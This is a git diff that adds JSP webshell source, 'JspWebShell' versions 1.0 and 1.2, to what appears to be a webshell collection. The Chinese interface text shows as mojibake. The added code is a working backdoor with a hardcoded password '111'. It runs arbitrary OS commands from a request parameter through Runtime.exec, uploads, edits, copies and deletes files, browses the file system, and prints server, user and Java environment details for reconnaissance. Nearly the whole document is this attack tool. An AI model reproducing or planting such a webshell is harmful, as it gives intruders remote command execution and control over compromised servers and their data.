+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳģʽ</td>
+            <td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>λ</td>
+          </tr>     
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷ËùÔÚµØÇø</td>
+            <td>&nbsp;<%=env.queryHashtable("user.country")%></td>
+            <td>&nbsp;·şÎñÆ÷ÓïÑÔ</td>
+            <td>&nbsp;<%=env.queryHashtable("user.language")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷ʱÇø</td>
+            <td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
+            <td>&nbsp;·şÎñÆ÷ʱ¼ä</td>
+            <td>&nbsp;<%=new java.util.Date()%> </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷½âÒëÒıÇæ</td>
+            <td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
+            <td width="130">&nbsp;·şÎñÆ÷¶Ë¿Ú</td>
+            <td width="170">&nbsp;<%= request.getServerPort() %></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;µ±Ç°Óû§</td>
+            <td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;Óû§Ä¿Â¼</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td align=left>&nbsp;±¾ÎļşÊµ¼Ê·¾¶</td>
+            <td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+    <table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+      <tr> 
+      <td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVAÏà¹Ø²ÎÊı</strong></font> 
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu1'>
+		<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;Ãû³Æ</td>
+            <td width="50%" height="22">&nbsp;Ó¢ÎÄÃû³Æ</td>
+            <td width="20%" height="22">&nbsp;°æ±¾</td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÔËĞĞ»·¾³Ãû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÔËĞĞ»·¾³ËµÃ÷ÊéÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAĞéÄâ»úÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAĞéÄâ»ú˵Ã÷ÊéÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
+          </tr>
+		  <%
+		  	float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
+			float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
+			float fPercent=fFreeMemory/fTotalMemory*100;
+		  %>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVAĞéÄâ»úÊ£ÓàÄڴ棺</td>
+            <td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M 
+            </td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVAĞéÄâ»ú·ÖÅäÄÚ´æ</td>
+            <td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M 
+            </td>
+          </tr>
+        </table>
+		  <table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;²ÎÊıÃû³Æ</td>
+            <td width="70%" height="22">&nbsp;²ÎÊı·¾¶</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.class.path </td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>	
+            </td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.home</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.endorsed.dirs</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.library.path</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%> 
+            </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.io.tmpdir</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+  <div id="testspeed" align="center"> </div>
+</CENTER></div>
+
+<%}
+else{
+if (editfile!=null)//if edit
+{
+%>
+<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1"> 
+  <table width="99%" height="232" border="0">
+    <tr> 
+      <td height="226"><form name="form2" method="post" action="">
+          <p align="center"> µØÖ·£º
+            <input name="editfile" type="text" value="<%=editfile%>" size="50">
+          </p>
+          <p align="center"> 
+            <textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
+            <input type="submit" name="Submit2" value="±£´æ">
+          </p>
+        </form> </td>
+    </tr>
+  </table>
+  <p>&nbsp;</p></div>
+<%}
+else{%>
+
+<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
+  <tr bgcolor="#333333"> 
+    <td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell 
+      version 1.0</font><font color="#FFFFFF">(ÍøվĿ¼:<%=config.getServletContext().getRealPath("/")%>)</font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td colspan="4"> <font color="#000000"> 
+      <%
+	  File[] fs = File.listRoots();
+	  for (int i = 0; i < fs.length; i++){
+	  %>
+      <a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">±¾µØ´ÅÅÌ(<%=fs[i].getPath()%>) 
+      </a> 
+      <%}%>
+      </font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td height="10" colspan="4"> <font color="#000000"> 
+      <form name="form1" method="post" action="">
+        <input type="text" name="command" class="button">
+        <input type="submit" name="Submit" value="CMDÃüÁîÖ´ĞĞ" class="button">
+      </form>
+      </font> <p> 
+        <%
+		String cmd = "";
+		InputStream ins = null;
+		String result = "";		
+		if (request.getParameter("command") != null) {		
+			cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
+        <%=result == "" ? "&nbsp;" : result%> 
+        <%}%>
+       </td>
+  </tr>
+  <FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
+    <tr bgcolor="#999999"> 
+      <td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150"  SIZE="50" class="button"> 
+        <INPUT TYPE="SUBMIT" VALUE="ÉÏ´«" class="button"> </td>
+      <td colspan="2"><a href="?jsptz=true" target="_blank">JSP̽Õë</a> </td>
+    </tr>
+  </FORM>
+  <%     String fileexe="";
+             String dir="";
+             String deldir=""; 
+			 String scrfile="";
+			 String dstfile="";
+			  fileexe=request.getParameter("fileexe");
+		     dir=request.getParameter("dir");
+			 deldir=request.getParameter("deldir");
+		     scrfile=request.getParameter("scrfile");
+			 dstfile=request.getParameter("dstfile");
+		  if (fileexe!=null)
+			{
+			//out.print(path+fileexe);
+			createFile(path+fileexe); 
+			}
+		  if (dir!=null)
+			{
+			//out.print(path+dir);
+			createFolder(path+dir); 
+			}
+		  if (deldir!=null)
+			{
+			//out.print(deldir);
+		    DeleteFolder(deldir); 
+			}
+			if (scrfile!=null&dstfile!=null)
+			{
+			//out.print(scrfile);
+			//out.print(dstfile);
+			copyfinish=fileCopy(scrfile, dstfile) ;
+			}
+			%>
+  <tr bgcolor="#CCCCCC"> 
+    <td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
+        Îļş¼ĞÃû£º 
+        <input name="dir" type="text" size="10" class="button">
+        <input type="submit" name="Submit3" value="н¨Ä¿Â¼" class="button">
+      </form></td>
+    <td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
+        ÎļşÃû£º 
+        <input name="fileexe" type="text" size="8" class="button">
+        <input type="submit" name="Submit4" value="н¨Îļş" class="button">
+      </form></td>
+    <td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
+        Îļş<input name="scrfile" type="text" size="15"class="button">
+        ¸´ÖƵ½
+        <input name="dstfile" type="text" size="15" class="button">
+        <input type="submit" name="Submit5" value="¸´ÖÆ" class="button">
+      </form><font color="#FF0000"><%if(copyfinish==true) out.print("¸´ÖƳɹ¦");%></font></td>
+  </tr>
+  <%//ÉÏ´«
+             String tempfilename="";
+             String up=request.getParameter("up");
+			// String tempfilepath=request.getParameter("filepath");
+			// out.print(tempfilepath);
+			  if(up!=null)
+		  {
+	       tempfilename=(String)session.getId();
+          //String tempfilename=request.getParameter("file");
+          File f1=new File(tempfilepath,tempfilename);
+          int n;
+          try
+          {
+              InputStream in=request.getInputStream();
+              BufferedInputStream my_in=new BufferedInputStream(in);
+              FileOutputStream fout=new FileOutputStream(f1);
+              BufferedOutputStream my_out=new BufferedOutputStream(fout);
+              byte[] b=new byte[10000];
+              while((n=my_in.read(b))!=-1)
+              {
+                   my_out.write(b,0,n);
+              }
+              my_out.flush();
+              my_out.close();
+              fout.close();
+              my_in.close();
+              in.close();
+             // out.print("Îļş´´½¨³É¹¦!<br>");
+          }
+          catch(IOException e)
+          {
+              out.print("Îļş´´½¨Ê§°Ü!");
+          }
+          
+          try
+          {   
+              RandomAccessFile random1=new RandomAccessFile(f1,"r");
+              random1.readLine();
+              String filename=random1.readLine();
+              byte[] b=filename.getBytes("ISO-8859-1");
+              filename=new String(b);
+              int pointer=filename.lastIndexOf('\\');
+              filename=filename.substring(pointer+1,filename.length()-1);
+              File f2=new File(tempfilepath,filename);
+              RandomAccessFile random2=new RandomAccessFile(f2,"rw");
+              random1.seek(0);
+              for(int i=1; i<=4; i++)
+              {
+                   String tempstr=random1.readLine();
+              }
+              long startPoint=random1.getFilePointer();
+              random1.seek(random1.length());
+              long mark=random1.getFilePointer();
+              int j=0;
+              long endPoint=0;
+              while((mark>=0)&&(j<=5))
+              {
+                   mark--;
+                   random1.seek(mark);
+                   n=random1.readByte();
+                   if(n=='\n')
+
+                   {
+                         j++;
+                         endPoint=random1.getFilePointer();
+                   }
+              }
+              long length=endPoint-startPoint+1;
+              int order=(int)(length/10000);
+              int left=(int)(length%10000);
+              byte[] c=new byte[10000];
+              random1.seek(startPoint);
+              for(int i=0; i<order; i++)
+              {
+                    random1.read(c);
+                    random2.write(c);
+              }
+              random1.read(c,0,left);
+              random2.write(c,0,left);
+              random1.close();
+              random2.close();
+              f1.delete();
+              out.print("ÎļşÉÏ´«³É¹¦!");
+          }
+          catch(Exception e)
+          {
+              out.print("ÎļşÉÏ´«Ê§°Ü!");
+          }
+
+		  }
+	
+  %>
+  <tr> 
+    <td width="196" height="48" valign="top" bgcolor="#999999"> 
+      <%  try {
+	//path=request.getParameter("path");
+		//if(path==null)
+		//path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isDirectory())
+		    {%>
+      <a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">ɾ³ı</a><br> 
+      <% }
+		
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("²»´æÔÚ»òûÓĞÈ¨ÏŞ");
+		}
+	%>
+      &nbsp; </td>
+    <td colspan="3" valign="top" bgcolor="#999999"> 
+      <%  try {
+	path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isFile())
+		    {//request.getContextPath()µÃµ½ĞéÄâ·¾¶%>
+     <%=fList[j].getName()%> 
+       <a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">±à¼­</a> 
+      &nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">ɾ³ı</a><br> 
+      <% }
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("²»´æÔÚ»òûÓĞÈ¨ÏŞ");
+		}
+	%>
+    </td>
+  </tr>
+</table>
+<p align="center">Power By ¾ø¶ÔÁã¶È[B.C.T] QQ:48124012</p>
+<p align="center">&nbsp;</p>
+<%}//if edit
+}
+}
+%>
+</body>
+</html>
\ No newline at end of file
diff --git a/php/JspWebshell_1.2.php b/php/JspWebshell_1.2.php
new file mode 100644
index 0000000..d08b158
--- /dev/null
+++ b/php/JspWebshell_1.2.php
@@ -0,0 +1,789 @@
+
+<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
+<%
+/**
+ * <p>Title:JspWebshell </p>
+ *
+ * <p>Description: jspÍøÕ¾¹ÜÀí</p>
+ *
+ * <p>Copyright:¾ø¶ÔÁã¶È[B.C.T] Copyright (c) 2006</p>
+ *
+ * <p>Company: zero.cnbct.org</p>
+ *  PS:±¾³ÌĞòÊÇĞ¡µÜ´¦ÓÚĞËȤËùĞ´£¬ÈçÓĞÒÉÎÊÇëÁªÏµQQ:48124012
+ * @version 1.2
+ */
+ String path="";
+ String selfName="";
+ boolean copyfinish=false;
+%>
+<%  selfName=request.getRequestURI();
+     // String editfile="";
+        String editfile=request.getParameter("editfile");
+		if (editfile!=null)
+		{editfile=new String(editfile.getBytes("ISO8859_1"));
+		}
+	  path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+%>
+<%!    
+    String _password ="111";//ÃÜÂë
+	public String readAllFile(String filePathName) throws IOException 
+	{ 
+	FileReader fr = new FileReader(filePathName); 
+	int count = fr.read();
+	String res="";
+	while(count != -1) 
+	{ 
+	//System.out.print((char)count); 
+		res=res+(char)count;
+	count = fr.read(); 
+	if(count == 13) 
+	{ 
+	fr.skip(1); 
+	} 
+	} 
+	fr.close(); 
+	return res;
+	} 
+public void writeFile(String filePathName,String args) throws IOException 
+{ 
+FileWriter fw = new FileWriter(filePathName); 
+PrintWriter out=new PrintWriter(fw); 
+out.write(args); 
+out.println(); 
+out.flush(); 
+fw.close(); 
+out.close(); 
+} 
+public boolean createFile(String filePathName) throws IOException 
+{ 
+boolean result = false; 
+File file = new File(filePathName); 
+if(file.exists()) 
+{ 
+System.out.println("ÎļşÒѾ´æÔÚ£¡"); 
+} 
+else 
+{ 
+file.createNewFile(); 
+result = true; 
+System.out.println("ÎļşÒѾ´´½¨£¡"); 
+} 
+return result; 
+}
+public boolean createFolder(String fileFolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(fileFolderName); 
+if(file.exists()) 
+{ 
+//file.delete(); 
+System.out.println("Ŀ¼ÒѾ´æÔÚ!"); 
+result = true; 
+} 
+else 
+{ 
+file.mkdir(); 
+System.out.println("Ŀ¼ÒѾ½¨Á¢!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+}  
+
+public boolean DeleteFolder(String filefolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(filefolderName); 
+if(file.exists()) 
+{ 
+file.delete(); 
+System.out.println("Ŀ¼ÒÑɾ³ı!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+} 
+public boolean validate(String password) {
+	if (password.equals(_password)) {
+		return true;
+	} else {
+		return false;
+	}
+}
+public String HTMLEncode(String str) {
+	str = str.replaceAll(" ", "&nbsp;");
+	str = str.replaceAll("<", "&lt;");
+	str = str.replaceAll(">", "&gt;");
+	str = str.replaceAll("\r\n", "<br>");
+	
+	return str;
+}
+    public String exeCmd(String cmd) {
+	Runtime runtime = Runtime.getRuntime();
+	Process proc = null;
+	String retStr = "";
+	InputStreamReader insReader = null;
+	char[] tmpBuffer = new char[1024];
+	int nRet = 0;
+	
+	try {
+		proc = runtime.exec(cmd);
+		insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+		while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+			retStr += new String(tmpBuffer, 0, nRet);
+		}
+		
+		insReader.close();
+		retStr = HTMLEncode(retStr);
+	} catch (Exception e) {
+		retStr = "<font color=\"red\">ÃüÁî´íÎó\"" + cmd + "\"";
+	} finally {
+		return retStr;
+	}
+	}
+	public boolean fileCopy(String srcPath, String dstPath) {
+	boolean bRet = true;
+	
+	try {
+		FileInputStream in = new FileInputStream(new File(srcPath));
+		FileOutputStream out = new FileOutputStream(new File(dstPath));
+		byte[] buffer = new byte[1024];
+		int nBytes;
+		
+
+		while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+			out.write(buffer, 0, nBytes);
+		}
+		
+		in.close();
+		out.close();
+	} catch (IOException e) {
+		bRet = false;
+	}	
+	
+	return bRet;
+}
+class EnvServlet
+{
+	public long timeUse=0;
+	public Hashtable htParam=new Hashtable();
+	private Hashtable htShowMsg=new Hashtable();
+	public void setHashtable()
+	{
+		Properties me=System.getProperties();
+		Enumeration em=me.propertyNames();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=me.getProperty(strKey);
+			htParam.put(strKey,strValue);
+		}
+	}	
+	public void getHashtable(String strQuery)
+	{
+		Enumeration em=htParam.keys();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=new String();
+			if(strKey.indexOf(strQuery,0)>=0)
+			{
+				strValue=(String)htParam.get(strKey);
+				htShowMsg.put(strKey,strValue);
+			}
+		}
+	}
+	public String queryHashtable(String strKey)
+	{
+		strKey=(String)htParam.get(strKey);
+		return strKey;
+	}
+/*	public long test_int()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		while(i<3000000)i++;
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}
+	public long test_sqrt()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		double db=(double)new Random().nextInt(1000);
+		while(i<200000){db=Math.sqrt(db);i++;}
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}*/
+}
+%>
+<%
+	EnvServlet env=new EnvServlet();
+	env.setHashtable();
+	//String action=new String(" ");
+	//String act=new String("action");
+	//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
+%>
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>JspWebShell By ¾ø¶ÔÁã¶È</title>
+<style>
+body {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	background-color: #666666;
+}
+A {
+	COLOR: black; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: black; TEXT-DECORATION: underline; none: 
+}
+td {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	color: #000000;
+}
+
+input.textbox {
+	border: black solid 1;
+	font-size: 12px;
+	height: 18px;
+}
+
+input.button {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	border: black solid 1;
+}
+
+td.datarows {
+	font-size: 12px;
+	font-family: "ËÎÌå";
+	height: 25px;
+	color: #000000;
+}
+.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
+textarea {
+border: black solid 1;
+}
+.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
+.table1 {BORDER:gray 0px ridge;}
+.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
+.tr1 {BACKGROUND-color:gray }
+</style>
+<script language="JavaScript" type="text/JavaScript">
+<!--
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
+//-->
+</script>
+</head>
+<body bgcolor="#666666">
+<%
+//session.setMaxInactiveInterval(_sessionOutTime * 60);
+String password=request.getParameter("password");
+if (password == null && session.getAttribute("password") == null) {
+
+%>
+
+<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px"> 
+  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
+    <tr> 
+      <td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
+          <tr> 
+            <TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell 
+              version 1.2¹ÜÀíµÇ¼ :::...</b></font></TD>
+            <TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By 
+              ¾ø¶ÔÁã¶È</FONT></TD>
+          </tr>
+          <form name="bctform" method="post">
+            <tr bgcolor="#999999"> 
+              <td height="30" colspan="2" align="center" class="td2"> 
+                <input name="password" type="password" class="textbox" id="Textbox" /> 
+                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" /> 
+              </td>
+            </tr>
+          </form>
+        </TABLE></td>
+    </tr>
+  </TABLE>
+</div>
+<%
+
+	} else {
+	
+	if (session.getAttribute("password") == null) {
+		
+		if (validate(password) == false) {
+			out.println("<div align=\"center\"><font color=\"red\"><li>ÃÜÂë´íÎó</font></div>");
+			out.close();
+			return;
+		}
+		
+		session.setAttribute("password", password);
+	} else {
+		password = (String)session.getAttribute("password");
+	}
+%>
+	<%
+		File tmpFile = null;
+		String delfile="";
+		String delfile1="";
+		String editpath="";
+		delfile1=request.getParameter("delfile");
+		editpath=request.getParameter("filepath");
+		if (delfile1!=null)
+		{delfile=new String(delfile1.getBytes("ISO8859_1"));
+		}
+        if ( delfile1!= null) {
+        //  out.print(delfile);
+	    	tmpFile = new File(delfile);
+		if (! tmpFile.delete()) {
+			out.print( "<font color=\"red\">ɾ³ıʧ°Ü</font><br>\n");
+			}
+			}
+%>
+  <%String editfilecontent=null;
+       String editfilecontent1=request.getParameter("content");
+	   // out.println(editfilecontent1);
+		//String save=request.getParameter("save");
+	   if (editfilecontent1!=null)
+	   {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
+          //   out.print(editfile);
+			//out.print(editfilecontent);
+            if (editfile!=null&editfilecontent!=null)
+			{try {writeFile(editfile,editfilecontent);}
+			 catch (Exception e) {out.print("Ğ´Èëʧ°Ü");}
+			 out.print("Ğ´Èë³É¹¦");
+			}
+			%>
+<%request.setCharacterEncoding("GBK");%>
+<%//String editfile=request.getParameter("editfile");
+//out.print(editfile);
+if (request.getParameter("jsptz")!=null)
+{%>
+<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2"> 
+  <CENTER>
+  <table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+  <tr> 
+      <td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>·şÎñÆ÷Ïà¹Ø²ÎÊı</strong></font>      
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+          <tr bgcolor="#999999" height="22">
+		  <td width="130" bgcolor="#999999">&nbsp;·şÎñÆ÷Ãû</td>
+            <td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳ</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%> 
+              <%=env.queryHashtable("sun.os.patch.level")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳÀàĞÍ</td>
+            <td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳģʽ</td>
+            <td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>λ</td>
+          </tr>     
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷ËùÔÚµØÇø</td>
+            <td>&nbsp;<%=env.queryHashtable("user.country")%></td>
+            <td>&nbsp;·şÎñÆ÷ÓïÑÔ</td>
+            <td>&nbsp;<%=env.queryHashtable("user.language")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷ʱÇø</td>
+            <td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
+            <td>&nbsp;·şÎñÆ÷ʱ¼ä</td>
+            <td>&nbsp;<%=new java.util.Date()%> </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷½âÒëÒıÇæ</td>
+            <td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
+            <td width="130">&nbsp;·şÎñÆ÷¶Ë¿Ú</td>
+            <td width="170">&nbsp;<%= request.getServerPort() %></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;µ±Ç°Óû§</td>
+            <td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;Óû§Ä¿Â¼</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td align=left>&nbsp;±¾ÎļşÊµ¼Ê·¾¶</td>
+            <td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+    <table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+      <tr> 
+      <td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVAÏà¹Ø²ÎÊı</strong></font> 
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu1'>
+		<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;Ãû³Æ</td>
+            <td width="50%" height="22">&nbsp;Ó¢ÎÄÃû³Æ</td>
+            <td width="20%" height="22">&nbsp;°æ±¾</td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÔËĞĞ»·¾³Ãû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÔËĞĞ»·¾³ËµÃ÷ÊéÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
